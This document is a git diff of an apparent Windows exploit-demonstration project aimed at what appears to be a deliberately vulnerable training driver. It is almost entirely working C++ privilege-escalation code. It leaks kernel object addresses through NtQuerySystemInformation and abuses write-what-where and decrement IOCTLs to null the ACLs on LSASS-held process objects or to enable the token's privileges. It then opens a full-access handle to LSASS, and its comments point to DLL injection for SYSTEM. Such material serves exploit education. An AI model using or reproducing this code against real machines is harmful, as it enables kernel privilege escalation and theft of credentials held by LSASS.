+#include "KernelAddressLeak.h"
+#include "Structures.h"
+
+
+// This function will overwrite the ACL of all objects that LSASS has opened with a NULL ACL.
+// This effectively removes the ACL, which will allow anyone to open a PROCESS_ALL_ACCESS handle to lsass
+// and do DLL injection (or another technique) to elevate to SYSTEM.
+// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
+// Test on Windows 6.1 x86/x64
+BOOL AttackWriteWhatWhere(HANDLE hDevice)
+{
+ BOOL functionSuccess = false;
+ DWORD processId = 0;
+ PVOID* objectAddresses = NULL;
+ size_t objectCount = 0;
+ BOOL bRc = false;
+ void* ioctlDest = NULL;
+ DATACOPY* dataCopy = NULL;
+ void* ioctlSrc = NULL;
+ HANDLE hLsass = NULL;
+
+ printf("+ Entering AttackWriteWhatWhere.\n");
+
+ //Get the process ID of lsass
+ BOOL success = GetProcessIdByName(L"lsass.exe", &processId);
+ if (!success)
+ {
+ printf("- Failed to get process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", processId);
+
+ //Leak the addresses of all the process handles LSASS has opened
+ success = LeakProcessObjectAddresses((HANDLE)processId, &objectAddresses, &objectCount);
+ if (!success)
+ {
+ printf("- Failed to call LeakProcessObjectAddresses.\n");
+ goto Cleanup;
+ }
+
+
+ for (size_t i = 0; i < objectCount; i++)
+ {
+ //
+ // Performing WriteWhatWhere to null process ACL
+ //
+ DWORD bytesReturned = 0;
+ dataCopy = new DATACOPY();
+ DWORD overwriteSize = sizeof(PVOID);
+ ioctlSrc = malloc(overwriteSize);
+ SecureZeroMemory(ioctlSrc, overwriteSize);
+
+ dataCopy->Dest = PVOID((UINT_PTR)objectAddresses[i] - overwriteSize);
+ dataCopy->DestLength = overwriteSize;
+ dataCopy->Source = ioctlSrc;
+ dataCopy->SourceLength = overwriteSize;
+
+ ioctlDest = malloc(overwriteSize);
+
+ printf("+ Overwriting address: 0x%p\n", dataCopy->Dest);
+
+ bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE,
+ dataCopy,
+ sizeof(*dataCopy),
+ ioctlDest, //Won't actually be used in this exploit
+ overwriteSize,
+ &bytesReturned,
+ NULL
+ );
+
+
+ if (!bRc)
+ {
+ printf("- Error in DeviceIoControl : %d\n", GetLastError());
+ goto Cleanup;
+ }
+ }
+
+
+ //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, processId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+
+
+ functionSuccess = true;
+
+Cleanup:
+ if (objectAddresses)
+ {
+ free(objectAddresses);
+ objectAddresses = NULL;
+ }
+ if (ioctlSrc)
+ {
+ free(ioctlSrc);
+ ioctlSrc = NULL;
+ }
+ if (ioctlDest)
+ {
+ free(ioctlDest);
+ ioctlDest = NULL;
+ }
+ if (dataCopy)
+ {
+ delete dataCopy;
+ dataCopy = NULL;
+ }
+ if (hLsass)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ return functionSuccess;
+}
+
+// This will decrement the privileges held by the current process by 1. This will effectively turn on almost all privileges
+// for the process, including SeDebugPrivilege. With SeDebugPrivilege, you can do DLL injection in to any process.
+// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
+// Test on Windows 6.1 x86/x64
+BOOL AttackDecAddress(HANDLE hDevice)
+{
+ BOOL functionSuccess = false;
+ PVOID tokenAddress = NULL;
+ PVOID privilegeAddress = NULL;
+ BOOL success = false;
+ size_t ioctlDest = 0;
+ DWORD bytesReturned = 0;
+ DECADDRESS inBuf = { 0 };
+ HANDLE hLsass = NULL;
+ DWORD lsassProcId = 0;
+
+ success = LeakCurrentUserTokenAddress(&tokenAddress);
+ if (!success)
+ {
+ printf("- Error calling LeakCurrentUserTokenAddress.\n");
+ goto Cleanup;
+ }
+
+ privilegeAddress = (PVOID)((UINT_PTR)tokenAddress + 0x48);
+
+ inBuf.Value = (size_t*)privilegeAddress;
+ inBuf.Dec = TRUE;
+
+ printf("+ Decrementing memory at address: 0x%p\n", inBuf.Value);
+
+ BOOL bRc = DeviceIoControl(hDevice,
+ (DWORD)IOCTL_KDEXPLOITME_METHOD_DECADDRESS,
+ &inBuf,
+ sizeof(inBuf),
+ &ioctlDest, //Won't actually be used in this exploit
+ sizeof(ioctlDest),
+ &bytesReturned,
+ NULL
+ );
+
+ if (!bRc)
+ {
+ printf("- Error in DeviceIoControl : %d\n", GetLastError());
+ goto Cleanup;
+ }
+
+ //Get the process ID of lsass
+ success = GetProcessIdByName(L"lsass.exe", &lsassProcId);
+ if (!success)
+ {
+ printf("- Failed to get process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
+
+ //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
+ hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
+ if (!hLsass)
+ {
+ printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
+
+ functionSuccess = true;
+
+Cleanup:
+ if (hLsass)
+ {
+ CloseHandle(hLsass);
+ hLsass = NULL;
+ }
+
+ return functionSuccess;
+}
diff --git a/ExploitDemos/GenericAttacks.h b/ExploitDemos/GenericAttacks.h
index 2f4346f..796737b 100644
--- a/ExploitDemos/GenericAttacks.h
+++ b/ExploitDemos/GenericAttacks.h
@@ -1,7 +1,7 @@
-#pragma once
-
-#include "stdafx.h"
-
-
-BOOL AttackWriteWhatWhere(HANDLE hDevice);
+#pragma once
+
+#include "stdafx.h"
+
+
+BOOL AttackWriteWhatWhere(HANDLE hDevice);
BOOL AttackDecAddress(HANDLE hDevice);
\ No newline at end of file
diff --git a/ExploitDemos/Helpers.cpp b/ExploitDemos/Helpers.cpp
index 347f7bb..a6a2511 100644
--- a/ExploitDemos/Helpers.cpp
+++ b/ExploitDemos/Helpers.cpp
@@ -1,45 +1,45 @@
-#pragma once
-#include "stdafx.h"
-#include "Helpers.h"
-
-BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired)
-{
- OSVERSIONINFO osVersionInfo = { 0 };
- osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
-
- if (!GetVersionEx(&osVersionInfo))
- {
- //printf("- Error: Unable to call GetVersionEx.\n");
- return false;
- }
-
- if (!(osVersionInfo.dwMajorVersion >= minMajorVersion && osVersionInfo.dwMajorVersion <= maxMajorVersion))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-
-
- if (!((osVersionInfo.dwMajorVersion == minMajorVersion && osVersionInfo.dwMinorVersion >= minMinorVersion)
- || (osVersionInfo.dwMajorVersion == maxMajorVersion && osVersionInfo.dwMinorVersion <= maxMinorVersion)))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-
-#ifdef _WIN64
- if (!(architectureRequired == AnyArchitecture || architectureRequired == AMD64))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-#else
- if (!(architectureRequired == AnyArchitecture || architectureRequired == X86))
- {
- //printf(" - Attempting to run exploit on unsupported OS version.\n");
- return false;
- }
-#endif
-
- return true;
+#pragma once
+#include "stdafx.h"
+#include "Helpers.h"
+
+BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired)
+{
+ OSVERSIONINFO osVersionInfo = { 0 };
+ osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
+
+ if (!GetVersionEx(&osVersionInfo))
+ {
+ //printf("- Error: Unable to call GetVersionEx.\n");
+ return false;
+ }
+
+ if (!(osVersionInfo.dwMajorVersion >= minMajorVersion && osVersionInfo.dwMajorVersion <= maxMajorVersion))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+
+
+ if (!((osVersionInfo.dwMajorVersion == minMajorVersion && osVersionInfo.dwMinorVersion >= minMinorVersion)
+ || (osVersionInfo.dwMajorVersion == maxMajorVersion && osVersionInfo.dwMinorVersion <= maxMinorVersion)))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+
+#ifdef _WIN64
+ if (!(architectureRequired == AnyArchitecture || architectureRequired == AMD64))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+#else
+ if (!(architectureRequired == AnyArchitecture || architectureRequired == X86))
+ {
+ //printf(" - Attempting to run exploit on unsupported OS version.\n");
+ return false;
+ }
+#endif
+
+ return true;
}
\ No newline at end of file
diff --git a/ExploitDemos/Helpers.h b/ExploitDemos/Helpers.h
index 007fa86..5cdee13 100644
--- a/ExploitDemos/Helpers.h
+++ b/ExploitDemos/Helpers.h
@@ -1,12 +1,12 @@
-#pragma once
-#pragma warning(disable: 4996) /* GetVersionInfoW is deprecated */
-#include "stdafx.h"
-
-typedef enum ArchitectureType
-{
- AnyArchitecture,
- X86,
- AMD64
-};
-
+#pragma once
+#pragma warning(disable: 4996) /* GetVersionInfoW is deprecated */
+#include "stdafx.h"
+
+typedef enum ArchitectureType
+{
+ AnyArchitecture,
+ X86,
+ AMD64
+};
+
BOOL VersionCheck(UINT32 maxMajorVersion, UINT32 maxMinorVersion, UINT32 minMajorVersion, UINT32 minMinorVersion, ArchitectureType architectureRequired);
\ No newline at end of file
diff --git a/ExploitDemos/KernelAddressLeak.cpp b/ExploitDemos/KernelAddressLeak.cpp
index 4c2e9c4..9a5b300 100644
--- a/ExploitDemos/KernelAddressLeak.cpp
+++ b/ExploitDemos/KernelAddressLeak.cpp
@@ -1,345 +1,345 @@
-#pragma once
-#include "stdafx.h"
-#include "KernelAddressLeak.h"
-
-
-//Helper functions
-bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion);
-BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo);
-
-
-
-//Returns true on success (and sets majorVersion and minorVersion). Returns false on failure.
-bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion)
-{
- bool success = false;
-
- if (IsWindowsVistaOrGreater())
- {
- success = true;
- *majorVersion = 6;
- *minorVersion = 0;
- }
- if (IsWindows7OrGreater())
- {
- *minorVersion = 1;
- }
- if (IsWindows8OrGreater())
- {
- *minorVersion = 2;
- }
- if (IsWindows8Point1OrGreater())
- {
- *minorVersion = 3;
- }
-
- return success;
-}
-
-BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo)
-{
- BOOL functionSuccess = false;
- ULONG handleInfoSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX)+(sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 10000);
- NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH; //Make status be an error so the loop starts.
- *handleInfo = NULL;
-
- HMODULE hModule = LoadLibraryW(L"ntdll.dll");
- tNtQuerySystemInformation pNtQuerySystemInformation = (tNtQuerySystemInformation)GetProcAddress(hModule, "NtQuerySystemInformation");
- FreeLibrary(hModule);
- if (pNtQuerySystemInformation == NULL)
- {
- printf("- Error: Cannot retrieve NtQuerySystemInformation address.\n");
- goto Cleanup;
- }
-
- ULONG requiredSize = 0;
- while (status == STATUS_INFO_LENGTH_MISMATCH)
- {
- if (*handleInfo)
- {
- free(*handleInfo);
- }
-
- //Allocate space for NtQuerySystemInformation and call it
- *handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(handleInfoSize);
- ZeroMemory(*handleInfo, handleInfoSize);
- status = (*pNtQuerySystemInformation)(SystemExtendedHandleInformation, *handleInfo, handleInfoSize, &requiredSize);
- //If there isn't enough space in the buffer, increase the buffer size
- if (NT_SUCCESS(status))
- {
- break;
- }
- else if (status == STATUS_INFO_LENGTH_MISMATCH)
- {
- ULONG additionalSpace = sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 1000;
- if (ULONG_MAX - additionalSpace < requiredSize)
- {
- printf("- Error: Looping error increasing buffersize for NtQuerySystemInformation.\n");
- goto Cleanup;
- }
-
- handleInfoSize = requiredSize + additionalSpace;
- }
- else
- {
- printf("- Error: Unexpected error from NtQuerySystemInformation. Error: 0x%x\n", status);
- goto Cleanup;
- }
- }
-
- printf("+ QueryNtHandles returning success: NtQuerySystemInformation returned %i entries.\n", (*handleInfo)->NumberOfHandles);
- functionSuccess = true;
-
-Cleanup:
- if (!functionSuccess)
- {
- if (*handleInfo)
- {
- free(*handleInfo);
- *handleInfo = NULL;
- }
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount)
-{
- BOOL functionSuccess = false;
-
- *objectAddresses = NULL;
- *objectCount = 0;
-
- NTSTATUS status = 0;
- PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
- USHORT processTypeIndex = 0;
- HANDLE hCurrentProc = NULL;
-
- //Get a real handle to the current process
- DWORD currentProcId = GetCurrentProcessId();
- hCurrentProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcId);
- if (hCurrentProc == NULL)
- {
- printf("- Unable to call OpenProcess for current process. Error code: 0x%p. Current process Id: %i", hCurrentProc, currentProcId);
- goto Cleanup;
- }
-
- if (!QueryNtHandles(&handleInfo))
- {
- printf("- Error calling QueryNtHandles to retrieve kernel handles info.");
- goto Cleanup;
- }
-
- size_t numRetrievedHandles = handleInfo->NumberOfHandles;
- PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
-
- //Need to determine what the ObjectTypeIndex value is for a process handle.
- //To do this, look for the process handle of the current process (that was opened earlier) in our current process and look at its ObjectIndexType.
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if ((handleEntry->UniqueProcessId == (HANDLE)currentProcId) && (handleEntry->HandleValue == hCurrentProc))
- {
- processTypeIndex = handleEntry->ObjectTypeIndex;
- break;
- }
-
- handleEntry++;
- }
-
- if (processTypeIndex == 0)
- {
- printf("- Unable to determine the ObjectTypeIndex for PROCESS objects.\n");
- goto Cleanup;
- }
- printf("+ Found ObjectTypeIndex for PROCESS objects: 0x%x\n", processTypeIndex);
-
- //Loop through the target remote process and find PROCESS objects
- handleEntry = handleInfo->Handles; //Reset this pointer
- printf("+ Total handles retrieved: %i\n", numRetrievedHandles);
- size_t numTargetHandles = 0;
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
- {
- numTargetHandles++;
- //printf("= Process ID: 0x%x, Handle value: 0x%x, ObjectID: 0x%x, Address: 0x%x\n", handleEntry->UniqueProcessId, handleEntry->HandleValue, handleEntry->ObjectTypeIndex, handleEntry->Object);
- }
-
- handleEntry++;
- }
-
- //Allocate space for the needed handles.
- *objectAddresses = (PVOID*)malloc(numTargetHandles * sizeof(PVOID));
- *objectCount = numTargetHandles;
-
- handleEntry = handleInfo->Handles; //Reset this pointer
- //Fill in an array of pointers. Each pointer points to a PROCESS structure in kernel mode that the target process has an open handle to.
- for (size_t i = 0, objectArrayIndex = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
- {
- (*objectAddresses)[objectArrayIndex] = handleEntry->Object;
- objectArrayIndex++;
- }
-
- handleEntry++;
- }
-
-
- functionSuccess = true;
-
-Cleanup:
- if (hCurrentProc)
- {
- CloseHandle(hCurrentProc);
- hCurrentProc = NULL;
- }
- if (handleInfo)
- {
- free(handleInfo);
- handleInfo = NULL;
- }
- if (!functionSuccess)
- {
- if (*objectAddresses)
- {
- free(*objectAddresses);
- *objectAddresses = NULL;
- *objectCount = 0;
- }
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress)
-{
- BOOL functionSuccess = false;
- PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
- DWORD currentProcessId = 0;
- BOOL success = false;
-
- currentProcessId = GetCurrentProcessId();
-
- if (hHandle == NULL)
- {
- printf("- Error: hHandle cannot be NULL\n");
- goto Cleanup;
- }
-
- //Get all kernel handles
- if (!QueryNtHandles(&handleInfo))
- {
- printf("- Error calling QueryNtHandles to retrieve kernel handles info.\n");
- goto Cleanup;
- }
-
- //Find the current token from the handles retrieved
- printf("+ Retrieved all kernel handles. Looking for the address of the supplied token.\n");
- size_t numRetrievedHandles = handleInfo->NumberOfHandles;
- PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
- for (size_t i = 0; i < numRetrievedHandles; i++)
- {
- if (handleEntry->UniqueProcessId == (HANDLE)currentProcessId && handleEntry->HandleValue == hHandle)
- {
- *tokenAddress = handleEntry->Object;
- printf("+ The address of the hHandle object is: 0x%p\n", *tokenAddress);
- functionSuccess = true;
- goto Cleanup;
- }
-
- handleEntry++;
- }
-
- printf("- Error trying to locate hHandle in the returned kernel handles.\n");
-
-Cleanup:
- if (handleInfo)
- {
- free(handleInfo);
- handleInfo = NULL;
- }
-
- return functionSuccess;
-}
-
-
-BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress)
-{
- BOOL functionSuccess = false;
- DWORD currentProcessId = 0;
- HANDLE hCurrentProcess = NULL;
- HANDLE hProcessToken = NULL;
-
- //Obtain a token for the current process
- currentProcessId = GetCurrentProcessId();
- hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcessId);
- if (!hCurrentProcess)
- {
- printf("- Error opening current process. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
-
- functionSuccess = OpenProcessToken(hCurrentProcess, TOKEN_QUERY, &hProcessToken);
- if (!functionSuccess)
- {
- printf("- Error opening process token. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Obtained a handle to the current process token.\n");
-
- functionSuccess = LeakAddressOfObjectByHandleInProcess(hProcessToken, tokenAddress);
-
-Cleanup:
- if (hCurrentProcess)
- {
- CloseHandle(hCurrentProcess);
- hCurrentProcess = NULL;
- }
- if (hProcessToken)
- {
- CloseHandle(hProcessToken);
- hProcessToken = NULL;
- }
-
- return functionSuccess;
-}
-
-
-BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId)
-{
- PROCESSENTRY32 processEntry = { 0 };
- processEntry.dwSize = sizeof(PROCESSENTRY32);
- BOOL returnValue = false;
-
- HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if (!hSnapshot)
- {
- goto Cleanup;
- }
-
- BOOL success = Process32FirstW(hSnapshot, &processEntry);
-
- while (success)
- {
- if (_wcsicmp(processName, processEntry.szExeFile) == 0)
- {
- *processId = processEntry.th32ProcessID;
- returnValue = true;
- goto Cleanup;
- }
-
- success = Process32Next(hSnapshot, &processEntry);
- }
-
-Cleanup:
- if (hSnapshot)
- {
- CloseHandle(hSnapshot);
- hSnapshot = NULL;
- }
-
- return returnValue;
+#pragma once
+#include "stdafx.h"
+#include "KernelAddressLeak.h"
+
+
+//Helper functions
+bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion);
+BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo);
+
+
+
+//Returns true on success (and sets majorVersion and minorVersion). Returns false on failure.
+bool GetOSVersion(DWORD* majorVersion, DWORD* minorVersion)
+{
+ bool success = false;
+
+ if (IsWindowsVistaOrGreater())
+ {
+ success = true;
+ *majorVersion = 6;
+ *minorVersion = 0;
+ }
+ if (IsWindows7OrGreater())
+ {
+ *minorVersion = 1;
+ }
+ if (IsWindows8OrGreater())
+ {
+ *minorVersion = 2;
+ }
+ if (IsWindows8Point1OrGreater())
+ {
+ *minorVersion = 3;
+ }
+
+ return success;
+}
+
+BOOL QueryNtHandles(PSYSTEM_HANDLE_INFORMATION_EX* handleInfo)
+{
+ BOOL functionSuccess = false;
+ ULONG handleInfoSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX)+(sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 10000);
+ NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH; //Make status be an error so the loop starts.
+ *handleInfo = NULL;
+
+ HMODULE hModule = LoadLibraryW(L"ntdll.dll");
+ tNtQuerySystemInformation pNtQuerySystemInformation = (tNtQuerySystemInformation)GetProcAddress(hModule, "NtQuerySystemInformation");
+ FreeLibrary(hModule);
+ if (pNtQuerySystemInformation == NULL)
+ {
+ printf("- Error: Cannot retrieve NtQuerySystemInformation address.\n");
+ goto Cleanup;
+ }
+
+ ULONG requiredSize = 0;
+ while (status == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ if (*handleInfo)
+ {
+ free(*handleInfo);
+ }
+
+ //Allocate space for NtQuerySystemInformation and call it
+ *handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(handleInfoSize);
+ ZeroMemory(*handleInfo, handleInfoSize);
+ status = (*pNtQuerySystemInformation)(SystemExtendedHandleInformation, *handleInfo, handleInfoSize, &requiredSize);
+ //If there isn't enough space in the buffer, increase the buffer size
+ if (NT_SUCCESS(status))
+ {
+ break;
+ }
+ else if (status == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ ULONG additionalSpace = sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)* 1000;
+ if (ULONG_MAX - additionalSpace < requiredSize)
+ {
+ printf("- Error: Looping error increasing buffersize for NtQuerySystemInformation.\n");
+ goto Cleanup;
+ }
+
+ handleInfoSize = requiredSize + additionalSpace;
+ }
+ else
+ {
+ printf("- Error: Unexpected error from NtQuerySystemInformation. Error: 0x%x\n", status);
+ goto Cleanup;
+ }
+ }
+
+ printf("+ QueryNtHandles returning success: NtQuerySystemInformation returned %i entries.\n", (*handleInfo)->NumberOfHandles);
+ functionSuccess = true;
+
+Cleanup:
+ if (!functionSuccess)
+ {
+ if (*handleInfo)
+ {
+ free(*handleInfo);
+ *handleInfo = NULL;
+ }
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakProcessObjectAddresses(HANDLE processId, PVOID** objectAddresses, size_t* objectCount)
+{
+ BOOL functionSuccess = false;
+
+ *objectAddresses = NULL;
+ *objectCount = 0;
+
+ NTSTATUS status = 0;
+ PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
+ USHORT processTypeIndex = 0;
+ HANDLE hCurrentProc = NULL;
+
+ //Get a real handle to the current process
+ DWORD currentProcId = GetCurrentProcessId();
+ hCurrentProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcId);
+ if (hCurrentProc == NULL)
+ {
+ printf("- Unable to call OpenProcess for current process. Error code: 0x%p. Current process Id: %i", hCurrentProc, currentProcId);
+ goto Cleanup;
+ }
+
+ if (!QueryNtHandles(&handleInfo))
+ {
+ printf("- Error calling QueryNtHandles to retrieve kernel handles info.");
+ goto Cleanup;
+ }
+
+ size_t numRetrievedHandles = handleInfo->NumberOfHandles;
+ PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
+
+ //Need to determine what the ObjectTypeIndex value is for a process handle.
+ //To do this, look for the process handle of the current process (that was opened earlier) in our current process and look at its ObjectIndexType.
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if ((handleEntry->UniqueProcessId == (HANDLE)currentProcId) && (handleEntry->HandleValue == hCurrentProc))
+ {
+ processTypeIndex = handleEntry->ObjectTypeIndex;
+ break;
+ }
+
+ handleEntry++;
+ }
+
+ if (processTypeIndex == 0)
+ {
+ printf("- Unable to determine the ObjectTypeIndex for PROCESS objects.\n");
+ goto Cleanup;
+ }
+ printf("+ Found ObjectTypeIndex for PROCESS objects: 0x%x\n", processTypeIndex);
+
+ //Loop through the target remote process and find PROCESS objects
+ handleEntry = handleInfo->Handles; //Reset this pointer
+ printf("+ Total handles retrieved: %i\n", numRetrievedHandles);
+ size_t numTargetHandles = 0;
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
+ {
+ numTargetHandles++;
+ //printf("= Process ID: 0x%x, Handle value: 0x%x, ObjectID: 0x%x, Address: 0x%x\n", handleEntry->UniqueProcessId, handleEntry->HandleValue, handleEntry->ObjectTypeIndex, handleEntry->Object);
+ }
+
+ handleEntry++;
+ }
+
+ //Allocate space for the needed handles.
+ *objectAddresses = (PVOID*)malloc(numTargetHandles * sizeof(PVOID));
+ *objectCount = numTargetHandles;
+
+ handleEntry = handleInfo->Handles; //Reset this pointer
+ //Fill in an array of pointers. Each pointer points to a PROCESS structure in kernel mode that the target process has an open handle to.
+ for (size_t i = 0, objectArrayIndex = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == processId && handleEntry->ObjectTypeIndex == processTypeIndex)
+ {
+ (*objectAddresses)[objectArrayIndex] = handleEntry->Object;
+ objectArrayIndex++;
+ }
+
+ handleEntry++;
+ }
+
+
+ functionSuccess = true;
+
+Cleanup:
+ if (hCurrentProc)
+ {
+ CloseHandle(hCurrentProc);
+ hCurrentProc = NULL;
+ }
+ if (handleInfo)
+ {
+ free(handleInfo);
+ handleInfo = NULL;
+ }
+ if (!functionSuccess)
+ {
+ if (*objectAddresses)
+ {
+ free(*objectAddresses);
+ *objectAddresses = NULL;
+ *objectCount = 0;
+ }
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakAddressOfObjectByHandleInProcess(HANDLE hHandle, PVOID* tokenAddress)
+{
+ BOOL functionSuccess = false;
+ PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
+ DWORD currentProcessId = 0;
+ BOOL success = false;
+
+ currentProcessId = GetCurrentProcessId();
+
+ if (hHandle == NULL)
+ {
+ printf("- Error: hHandle cannot be NULL\n");
+ goto Cleanup;
+ }
+
+ //Get all kernel handles
+ if (!QueryNtHandles(&handleInfo))
+ {
+ printf("- Error calling QueryNtHandles to retrieve kernel handles info.\n");
+ goto Cleanup;
+ }
+
+ //Find the current token from the handles retrieved
+ printf("+ Retrieved all kernel handles. Looking for the address of the supplied token.\n");
+ size_t numRetrievedHandles = handleInfo->NumberOfHandles;
+ PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handleEntry = handleInfo->Handles;
+ for (size_t i = 0; i < numRetrievedHandles; i++)
+ {
+ if (handleEntry->UniqueProcessId == (HANDLE)currentProcessId && handleEntry->HandleValue == hHandle)
+ {
+ *tokenAddress = handleEntry->Object;
+ printf("+ The address of the hHandle object is: 0x%p\n", *tokenAddress);
+ functionSuccess = true;
+ goto Cleanup;
+ }
+
+ handleEntry++;
+ }
+
+ printf("- Error trying to locate hHandle in the returned kernel handles.\n");
+
+Cleanup:
+ if (handleInfo)
+ {
+ free(handleInfo);
+ handleInfo = NULL;
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL LeakCurrentUserTokenAddress(PVOID* tokenAddress)
+{
+ BOOL functionSuccess = false;
+ DWORD currentProcessId = 0;
+ HANDLE hCurrentProcess = NULL;
+ HANDLE hProcessToken = NULL;
+
+ //Obtain a token for the current process
+ currentProcessId = GetCurrentProcessId();
+ hCurrentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, currentProcessId);
+ if (!hCurrentProcess)
+ {
+ printf("- Error opening current process. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+
+ functionSuccess = OpenProcessToken(hCurrentProcess, TOKEN_QUERY, &hProcessToken);
+ if (!functionSuccess)
+ {
+ printf("- Error opening process token. Error code: 0x%x\n", GetLastError());
+ goto Cleanup;
+ }
+ printf("+ Obtained a handle to the current process token.\n");
+
+ functionSuccess = LeakAddressOfObjectByHandleInProcess(hProcessToken, tokenAddress);
+
+Cleanup:
+ if (hCurrentProcess)
+ {
+ CloseHandle(hCurrentProcess);
+ hCurrentProcess = NULL;
+ }
+ if (hProcessToken)
+ {
+ CloseHandle(hProcessToken);
+ hProcessToken = NULL;
+ }
+
+ return functionSuccess;
+}
+
+
+BOOL GetProcessIdByName(LPCWSTR processName, DWORD* processId)
+{
+ PROCESSENTRY32W processEntry = { 0 };
+ processEntry.dwSize = sizeof(PROCESSENTRY32W);
+ BOOL returnValue = false;
+
+ HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+ if (!hSnapshot)
+ {
+ goto Cleanup;
+ }
+
+ BOOL success = Process32FirstW(hSnapshot, &processEntry);
+
+ while (success)
+ {
+ if (_wcsicmp(processName, processEntry.szExeFile) == 0)
+ {
+ *processId = processEntry.th32ProcessID;
+ returnValue = true;
+ goto Cleanup;
+ }
+
+ success = Process32NextW(hSnapshot, &processEntry);
+ }
+
+Cleanup:
+ if (hSnapshot)
+ {
+ CloseHandle(hSnapshot);
+ hSnapshot = NULL;
+ }
+
+ return returnValue;
}
\ No newline at end of file
